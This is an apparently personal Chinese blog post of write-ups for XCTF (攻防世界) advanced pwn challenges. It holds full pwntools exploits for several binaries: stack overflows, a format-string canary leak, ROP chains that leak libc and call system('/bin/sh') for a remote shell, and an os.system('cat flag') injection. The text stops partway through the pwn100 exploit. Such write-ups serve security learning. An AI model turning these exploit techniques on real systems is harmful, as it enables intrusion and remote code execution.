<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="utf-8">
  
  
  
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <title>
    攻防世界进阶区 |
    
    summerN&#39;s blog</title>
  
    <link rel="shortcut icon" href="/favicon.ico">
  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
  
<script src="/js/pace.min.js"></script>

<meta name="generator" content="Hexo 4.1.1"><link rel="alternate" href="/atom.xml" title="summerN's blog" type="application/atom+xml">
</head>

<body>
<main class="content">
  <section class="outer">
  

<article id="post-攻防世界进阶区" class="article article-type-post" itemscope itemprop="blogPost" data-scroll-reveal>
  
  <div class="article-inner">
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      攻防世界进阶区
    </h1>
  
  




      </header>
    

    
      <div class="article-meta">
        <a href="/2020/01/13/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E8%BF%9B%E9%98%B6%E5%8C%BA/" class="article-date">
  <time datetime="2020-01-13T15:09:26.763Z" itemprop="datePublished">2020-01-13</time>
</a>
        
      </div>
    

    
      
    <div class="tocbot"></div>





    

    <div class="article-entry" itemprop="articleBody">
      


      

      
        <h1 id="攻防世界进阶区"><a href="#攻防世界进阶区" class="headerlink" title="攻防世界进阶区"></a>攻防世界进阶区</h1><a id="more"></a>

<h2 id="1-dice-game"><a href="#1-dice-game" class="headerlink" title="1. dice _ game"></a>1. dice _ game</h2><p>同新手区的那个随机数问题</p>
<p>exp：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/python2</span></span><br><span class="line"><span class="comment">#encoding:utf-8</span></span><br><span class="line"><span class="comment">#__author__='summerN@DL&amp;S'</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> ctypes <span class="keyword">import</span> *</span><br><span class="line">file_name = <span class="string">'./dice_game'</span></span><br><span class="line">libc_name = <span class="string">'./libc.so.6'</span></span><br><span class="line">ip = <span class="string">'111.198.29.45'</span></span><br><span class="line">port = <span class="string">'43605'</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># context.arch = 'amd64'</span></span><br><span class="line"></span><br><span class="line">context.log_level=<span class="string">'debug'</span></span><br><span class="line">context.terminal=[<span class="string">'tmux'</span>,<span class="string">'split'</span>,<span class="string">'-h'</span>]</span><br><span class="line"><span class="comment">#libc = ELF(libc_name)</span></span><br><span class="line">elf = ELF(file_name)</span><br><span class="line">libc = cdll.LoadLibrary(<span class="string">"libc.so.6"</span>)</span><br><span class="line">p = remote(ip,port)</span><br><span class="line">libc.srand(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">"Welcome, let me know your name: "</span>)</span><br><span class="line">payload = <span class="string">"a"</span> * (<span class="number">0x40</span>) + p64(<span class="number">1</span>)</span><br><span class="line">p.sendline(payload)</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">50</span>):</span><br><span class="line">	p.sendlineafter(<span class="string">"Give me the point(1~6): "</span>,str(libc.rand()%<span class="number">6</span> + <span class="number">1</span>))</span><br><span class="line"><span class="keyword">print</span> p.recvall()</span><br></pre></td></tr></table></figure>

<h2 id="2-forgot"><a href="#2-forgot" class="headerlink" title="2.forgot"></a>2.forgot</h2><p>使用@字符绕过下面的嵌套着swich语句的for循环</p>
<p>使得v14一直为1</p>
<p>从而使后面的调用函数的地址一直是v3的值</p>
<p>我们只需栈溢出覆盖v3的值为危险函数地址就好</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/python2</span></span><br><span class="line"><span class="comment">#encoding:utf-8</span></span><br><span class="line"><span class="comment">#__author__='summerN@DL&amp;S'</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line">file_name = <span class="string">'./1'</span></span><br><span class="line">libc_name = <span class="string">''</span></span><br><span class="line">ip = <span class="string">'111.198.29.45'</span></span><br><span class="line">port = <span class="string">'59557'</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># context.arch = 'amd64'</span></span><br><span class="line"></span><br><span class="line">context.log_level=<span class="string">'debug'</span></span><br><span class="line">context.terminal=[<span class="string">'tmux'</span>,<span class="string">'split'</span>,<span class="string">'-h'</span>]</span><br><span class="line"><span class="comment">#libc = ELF(libc_name)</span></span><br><span class="line">elf = ELF(file_name)</span><br><span class="line">p = remote(ip,port)</span><br><span class="line"></span><br><span class="line">system = <span class="number">0x80486cc</span></span><br><span class="line">payload = <span class="string">"@"</span> * <span class="number">32</span> + p32(system)</span><br><span class="line">payload1 = <span class="string">"summerN"</span></span><br><span class="line">p.sendlineafter(<span class="string">"&gt; "</span>,<span class="string">"a"</span>)</span><br><span class="line">p.sendlineafter(<span class="string">"&gt; "</span>,payload)</span><br><span class="line"><span class="keyword">print</span> p.recvall()</span><br></pre></td></tr></table></figure>

<h2 id="3-warmup"><a href="#3-warmup" class="headerlink" title="3.warmup"></a>3.warmup</h2><h5 id="先看一下sprintf"><a href="#先看一下sprintf" class="headerlink" title="先看一下sprintf()"></a>先看一下sprintf()</h5><p>sprintf指的是字符串格式化命令，函数声明为 int sprintf(char *string, char *format<br>[,argument,…]);，主要功能是把格式化的数据写入某个字符串中，即发送格式化输出到 string 所指向的字符串。sprintf<br>是个<a href="https://baike.baidu.com/item/变参/9844833" target="_blank" rel="noopener">变参</a>函数。使用sprintf 对于写入buffer的字符数是没有限制的，这就存在了buffer溢出的可能性。解决这个问题，可以考虑使用 <a href="https://baike.baidu.com/item/snprintf" target="_blank" rel="noopener">snprintf</a>函数，该函数可对写入字符数做出限制。</p>
<p>题目直接通过sprintf函数泄露出了危险函数地址</p>
<p>exp:</p>
<h2 id="4-Mary-Morton"><a href="#4-Mary-Morton" class="headerlink" title="4.Mary_Morton"></a>4.Mary_Morton</h2><p>步骤：</p>
<p>1.通过格式化字符串漏洞泄露cannary</p>
<p>2.绕过cannary执行危险函数</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="comment">#!/usr/bin/python2</span></span><br><span class="line"><span class="comment">#encoding:utf-8</span></span><br><span class="line"><span class="comment">#__author__='summerN@DL&amp;S'</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line">file_name = <span class="string">'./1'</span></span><br><span class="line">libc_name = <span class="string">''</span></span><br><span class="line">ip = <span class="string">'111.198.29.45'</span></span><br><span class="line">port = <span class="string">'57071'</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># context.arch = 'amd64'</span></span><br><span class="line"></span><br><span class="line">context.log_level=<span class="string">'debug'</span></span><br><span class="line">context.terminal=[<span class="string">'tmux'</span>,<span class="string">'split'</span>,<span class="string">'-h'</span>]</span><br><span class="line"><span class="comment">#libc = ELF(libc_name)</span></span><br><span class="line">elf = ELF(file_name)</span><br><span class="line"><span class="comment">#p=process(file_name)</span></span><br><span class="line">p=remote(ip,port)</span><br><span class="line">alarm_add = <span class="number">0x4008DA</span></span><br><span class="line">offset = <span class="number">6</span></span><br><span class="line">offset1 = offset + (<span class="number">0x90</span><span class="number">-8</span>)/<span class="number">8</span></span><br><span class="line"><span class="comment">#gdb.attach(p)</span></span><br><span class="line">p.recvuntil(<span class="string">"3. Exit the battle \n"</span>)</span><br><span class="line">p.sendline(<span class="string">"2"</span>)</span><br><span class="line">payload = <span class="string">"%23$p"</span></span><br><span class="line">p.sendline(payload)</span><br><span class="line">cann = int(p.recv(<span class="number">18</span>),<span class="number">16</span>)</span><br><span class="line"><span class="keyword">print</span> cann</span><br><span class="line">p.recvuntil(<span class="string">"3. Exit the battle \n"</span>)</span><br><span class="line">payload1 = <span class="string">'a'</span>*(<span class="number">0x88</span>) + p64(cann) + p64(<span class="number">1</span>) + p64(<span class="number">0x4008DA</span>)  <span class="comment">#p64里面不能有字符串</span></span><br><span class="line">p.sendline(<span class="string">"1"</span>)</span><br><span class="line">p.sendline(payload1)</span><br><span class="line"><span class="comment">#p.recvline()</span></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="5-pwn1"><a href="#5-pwn1" class="headerlink" title="5.pwn1"></a>5.pwn1</h2><p>这个题的思路：</p>
<p>1.通过自带的puts函数泄露cannary</p>
<p>2.构造简单的rop泄露libc版本与基地址</p>
<p>3.拿到shell</p>
<p>注意：</p>
<p>本题中，如果想执行我们覆盖掉的返回地址，必须使程序结束，即s=3</p>
<p>因为我们覆盖的是main函数的返回地址，如果一直进行while循环的话是不可能进行return的</p>
<p>上exp：</p>
<p>别看exp很长，因为我走了很多弯路，其实exp很简单</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/python2</span></span><br><span class="line"><span class="comment">#encoding:utf-8</span></span><br><span class="line"><span class="comment">#__author__='summerN@DL&amp;S'</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line">file_name = <span class="string">'./babystack'</span></span><br><span class="line">libc_name = <span class="string">'./libc-2.23.so'</span></span><br><span class="line">ip = <span class="string">'111.198.29.45'</span></span><br><span class="line">port = <span class="string">'45399'</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># context.arch = 'amd64'</span></span><br><span class="line"></span><br><span class="line">context.log_level=<span class="string">'debug'</span></span><br><span class="line">context.terminal=[<span class="string">'tmux'</span>,<span class="string">'split'</span>,<span class="string">'-h'</span>]</span><br><span class="line"><span class="comment">#libc = ELF(libc_name)</span></span><br><span class="line">elf = ELF(file_name)</span><br><span class="line">p = remote(ip,port)</span><br><span class="line"><span class="comment">#p = process(file_name)</span></span><br><span class="line">pop_rdi = <span class="number">0x0000000000400a93</span></span><br><span class="line">main_addr = <span class="number">0x400908</span></span><br><span class="line"></span><br><span class="line">puts_plt = elf.plt[<span class="string">'puts'</span>]</span><br><span class="line">puts_got = elf.got[<span class="string">'puts'</span>]</span><br><span class="line"><span class="keyword">print</span> hex(puts_plt)</span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">"&gt;&gt; "</span>)</span><br><span class="line">p.sendline(<span class="string">"1"</span>)</span><br><span class="line">payload1 = <span class="string">"a"</span> * (<span class="number">0x90</span><span class="number">-8</span>) + <span class="string">"a"</span></span><br><span class="line">p.send(payload1)</span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">"&gt;&gt; "</span>)</span><br><span class="line">p.sendline(<span class="string">"2"</span>)</span><br><span class="line">p.recvuntil(<span class="string">"a"</span> * (<span class="number">0x90</span> <span class="number">-7</span>))</span><br><span class="line"><span class="comment">#print u64(p.recv(7).strip("\n").rjust(8,"\x00"))</span></span><br><span class="line">cannary = hex(u64(p.recv(<span class="number">7</span>).strip(<span class="string">"\n"</span>).rjust(<span class="number">8</span>,<span class="string">"\x00"</span>)))</span><br><span class="line"><span class="comment">#print p.recvline().strip("\n").ljust(8,"\x00") </span></span><br><span class="line"><span class="keyword">print</span> cannary</span><br><span class="line"><span class="string">'''</span></span><br><span class="line"><span class="string">p.recvuntil("&gt;&gt; ")</span></span><br><span class="line"><span class="string">#payload2 = "a" * (0x90-8) + p64(int(cannary,16)) + "b" * 8 + </span></span><br><span class="line"><span class="string">payload2 = p64(puts_got)</span></span><br><span class="line"><span class="string">p.sendline("1")</span></span><br><span class="line"><span class="string">p.send(payload2)</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">p.recvuntil("&gt;&gt; ")</span></span><br><span class="line"><span class="string">p.sendline("2")</span></span><br><span class="line"><span class="string">start_add = u64(p.recv().ljust(8,"\x00"))</span></span><br><span class="line"><span class="string">print hex(start_add)</span></span><br><span class="line"><span class="string">base_add = start_add - libc.symbols['__libc_start_main']</span></span><br><span class="line"><span class="string">print hex(libc.symbols['__libc_start_main'])</span></span><br><span class="line"><span class="string">print hex(base_add)</span></span><br><span class="line"><span class="string">sys_add = base_add + libc.symbols['system']</span></span><br><span class="line"><span class="string">bin_add = base_add + libc.search("/bin/sh\x00").next()</span></span><br><span class="line"><span class="string">'''</span></span><br><span class="line">p.recvuntil(<span class="string">"&gt;&gt; "</span>)</span><br><span class="line">payload2 = <span class="string">'a'</span>*<span class="number">0x88</span>+p64(int(cannary,<span class="number">16</span>))+<span class="string">'a'</span>*<span class="number">8</span> + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main_addr)</span><br><span class="line">p.sendline(<span class="string">"1"</span>)</span><br><span class="line">p.sendline(payload2)</span><br><span class="line">p.recvuntil(<span class="string">"&gt;&gt; "</span>)</span><br><span class="line">p.sendline(<span class="string">"3"</span>)</span><br><span class="line">start_add = u64(p.recv(<span class="number">8</span>).ljust(<span class="number">8</span>,<span class="string">'\x00'</span>))</span><br><span class="line">libc = LibcSearcher(<span class="string">"puts"</span>,start_add)</span><br><span class="line">libc_add = start_add - libc.dump(<span class="string">"puts"</span>)</span><br><span class="line"><span class="comment">#print start_add</span></span><br><span class="line"><span class="comment">#base_add = start_add - libc.symbols['puts']</span></span><br><span class="line"><span class="comment">#print hex(libc.symbols['puts'])</span></span><br><span class="line"><span class="comment">#print hex(base_add)</span></span><br><span class="line">sys_add = libc_add + libc.dump(<span class="string">"system"</span>)</span><br><span class="line">bin_add = libc_add + libc.dump(<span class="string">"str_bin_sh"</span>)</span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">"&gt;&gt; "</span>)</span><br><span class="line">p.sendline(<span class="string">"1"</span>)</span><br><span class="line">payload3 = <span class="string">"a"</span> * (<span class="number">0x90</span><span class="number">-8</span>) + p64(int(cannary,<span class="number">16</span>)) + p64(<span class="number">1</span>) + p64(pop_rdi) + p64(bin_add) + p64(sys_add)</span><br><span class="line">p.sendline(payload3)</span><br><span class="line">p.recvuntil(<span class="string">"&gt;&gt; "</span>)</span><br><span class="line">p.sendline(<span class="string">"3"</span>)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="6-monkey"><a href="#6-monkey" class="headerlink" title="6.monkey"></a>6.monkey</h2><p>64位程序</p>
<p>从来没遇见过引入js库的pwn题</p>
<p>引入了js，估计就是个js语言解释器</p>
<p>注意：</p>
<p>1.这道题目多了几个动态链接库，我先说明一下怎么在python+pwn中使用动态链接库：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">p = process([process_name], env=&#123;<span class="string">'LD_LIBRARY_PATH'</span>:<span class="string">'./'</span>&#125;)</span><br></pre></td></tr></table></figure>

<p>2.</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">p.sendlineafter(&#39;js&gt;&#39;,&#39;os.system(\&#39;cat flag\&#39;)&#39;)</span><br></pre></td></tr></table></figure>

<p>这里我们需要在后面加上\进行转移</p>
<p>或者将里面的单引号转变为双引号</p>
<p>我们发现我们输入的js函数会执行，因此上exp：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#encoding:utf-8</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line">file_name = <span class="string">'./js'</span></span><br><span class="line">ip = <span class="string">'111.198.29.45'</span></span><br><span class="line">port = <span class="string">'42533'</span></span><br><span class="line">p = remote(ip,port)</span><br><span class="line"><span class="comment">#p = process([file_name], env=&#123;'LD_LIBRARY_PATH':'./'&#125;) #在本地中使用动态库</span></span><br><span class="line">p.sendlineafter(<span class="string">'js&gt;'</span>,<span class="string">'os.system(\'cat flag\')'</span>)</span><br><span class="line">p.recv()</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="7-stack2"><a href="#7-stack2" class="headerlink" title="7.stack2"></a>7.stack2</h2><p>32位程序</p>
<p><img src="C:%5CUsers%5CAdministrator%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5C1579109262215.png" alt="1579109262215"></p>
<p>我们现在v13处下断点</p>
<p>之后再在return 0 处下断点</p>
<p>这样的话可以让我们找到输入数字的栈地址，更改时的栈地址，以及在跳入return 0 之前以及执行ret汇编指令之前的变化情况从而获取偏移量</p>
<p><img src="https://i.loli.net/2020/01/16/H36M18FjuCIB5aL.png" alt="QQ截图20200116012503.png"></p>
<p><img src="https://i.loli.net/2020/01/16/OdYxFgqyhQHGC3u.png" alt="QQ截图20200116012525.png"></p>
<p><img src="https://i.loli.net/2020/01/16/LAlWa5o6DPdmi7U.png" alt="QQ截图20200116012517.png"></p>
<p><img src="https://i.loli.net/2020/01/16/Uuy5hGgpbd2eozr.png" alt="QQ截图20200116012513.png"></p>
<p>改变了v13[1]</p>
<p><a href="https://blog.csdn.net/xi_niuniu/article/details/44978207" target="_blank" rel="noopener">https://blog.csdn.net/xi_niuniu/article/details/44978207</a></p>
<p>ret 可以理解为pop eip</p>
<p>那么我们在还没有执行ret的时候</p>
<p>eip指向的为返回地址，而此时还没有pop eip</p>
<p>所以现在esp指向的栈地址即为返回地址所在的位置，也就是我们想要的偏移地址最低位字节的地址</p>
<p>通过这个我们可以计算offset = （0x43cc-4348）= 0x84</p>
<p>这是最难的地方</p>
<p>其次，从其他大佬wp可知，本体的靶机并没有bash，所以使用原来的后门没有用</p>
<p>因此我们要构造一个rop</p>
<p>1.call system指令地址</p>
<p>2.sh</p>
<p>写exp：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/python2</span></span><br><span class="line"><span class="comment">#encoding:utf-8</span></span><br><span class="line"><span class="comment">#__author__='summerN@DL&amp;S'</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line">file_name = <span class="string">'./1'</span></span><br><span class="line">libc_name = <span class="string">''</span></span><br><span class="line">ip = <span class="string">'111.198.29.45'</span></span><br><span class="line">port = <span class="string">'37458'</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># context.arch = 'amd64'</span></span><br><span class="line"></span><br><span class="line">context.log_level=<span class="string">'debug'</span></span><br><span class="line">context.terminal=[<span class="string">'tmux'</span>,<span class="string">'split'</span>,<span class="string">'-h'</span>]</span><br><span class="line"><span class="comment">#libc = ELF(libc_name)</span></span><br><span class="line">elf = ELF(file_name)</span><br><span class="line">p = remote(ip,port)</span><br><span class="line">offset = <span class="number">0x84</span></span><br><span class="line">sh_add = <span class="number">0x08048987</span></span><br><span class="line">call_sys = <span class="number">0x080485B4</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">addr</span><span class="params">(offset,size)</span>:</span></span><br><span class="line">	p.sendline(<span class="string">'3'</span>)</span><br><span class="line">	p.recvuntil(<span class="string">"which number to change:"</span>)</span><br><span class="line">	p.sendline(str(offset))</span><br><span class="line">	p.recvuntil(<span class="string">"new number:"</span>)</span><br><span class="line">	p.sendline(str(size))</span><br><span class="line">p.recvuntil(<span class="string">"How many numbers you have:\n"</span>)</span><br><span class="line">p.sendline(<span class="string">"1"</span>)</span><br><span class="line">p.recvuntil(<span class="string">"Give me your numbers\n"</span>)</span><br><span class="line">p.sendline(<span class="string">"255"</span>)</span><br><span class="line">addr(offset,<span class="number">0xB4</span>)</span><br><span class="line">addr(offset+<span class="number">0x1</span>,<span class="number">0x85</span>)</span><br><span class="line">addr(offset+<span class="number">0x2</span>,<span class="number">0x04</span>)</span><br><span class="line">addr(offset+<span class="number">0x3</span>,<span class="number">0x08</span>)</span><br><span class="line"></span><br><span class="line">addr(offset+<span class="number">0x4</span>,<span class="number">0x87</span>)</span><br><span class="line">addr(offset+<span class="number">0x5</span>,<span class="number">0x89</span>)</span><br><span class="line">addr(offset+<span class="number">0x6</span>,<span class="number">0x04</span>)</span><br><span class="line">addr(offset+<span class="number">0x7</span>,<span class="number">0x08</span>)</span><br><span class="line"><span class="comment">#p.recv()</span></span><br><span class="line">p.sendline(<span class="string">"5"</span>)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="8-pwn100"><a href="#8-pwn100" class="headerlink" title="8.pwn100"></a>8.pwn100</h2><p> 本题设计了中级rop中的ret init</p>
<p>1.我们首先使用puts获得libc基地址</p>
<p>但是别忘了将收到的地址去掉不该有的东西，例如“\n”，我这个铁憨憨就因为这个狗东西废了一个小孩是</p>
<p>2.得到libc版本以及system与str_bin_sh</p>
<p>3.构造rdi ret getshell</p>
<p>注意：</p>
<p>1.本题有很多解决方法，但是我感觉只需要rdi ret 这个gadget就可以</p>
<p>应该是最简单的方法</p>
<p>2.注意ret2__libc_csu_init的使用方法，被调函数要是用其got地址</p>
<p>exp:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/python2</span></span><br><span class="line"><span class="comment">#encoding:utf-8</span></span><br><span class="line"><span class="comment">#__author__='summerN@DL&amp;S'</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line">file_name = <span class="string">'./1'</span></span><br><span class="line">libc_name = <span class="string">''</span></span><br><span class="line">ip = <span class="string">'111.198.29.45'</span></span><br><span class="line">port = <span class="string">'44187'</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># context.arch = 'amd64'</span></span><br><span class="line"></span><br><span class="line">context.log_level=<span class="string">'debug'</span></span><br><span class="line">context.terminal=[<span class="string">'tmux'</span>,<span class="string">'split'</span>,<span class="string">'-h'</span>]</span><br><span class="line"><span class="comment">#libc = ELF(libc_name)</span></span><br><span class="line">elf = ELF(file_name)</span><br><span class="line">p = remote(ip,port)</span><br><span class="line"><span class="comment">#p = process(file_name)</span></span><br><span class="line"></span><br><span class="line">pop_rdi = <span class="number">0x0000000000400763</span></span><br><span class="line">offset = <span class="number">0x40</span></span><br><span class="line">fakeebp = <span class="number">1</span></span><br><span class="line">csu_end_addr = <span class="number">0x000000000040075A</span></span><br><span class="line">csu_front_addr = <span class="number">0x0000000000400740</span></span><br><span class="line">main_add = <span class="number">0x4006B8</span></span><br><span class="line">puts_plt = elf.plt[<span class="string">'puts'</span>]</span><br><span class="line"><span class="keyword">print</span> puts_plt</span><br><span class="line">start_got = elf.got[<span class="string">'__libc_start_main'</span>]</span><br><span class="line">puts_got = elf.got[<span class="string">'puts'</span>]</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">csu</span><span class="params">(rbx, rbp, r12, r13 , r14, r15, last)</span>:</span> <span class="comment">#这里的r13 r14 r15 分别为第三 第二 第一个参数</span></span><br><span class="line">    <span class="comment"># pop rbx,rbp,r12,r13,r14,r15</span></span><br><span class="line">    <span class="comment"># rbx should be 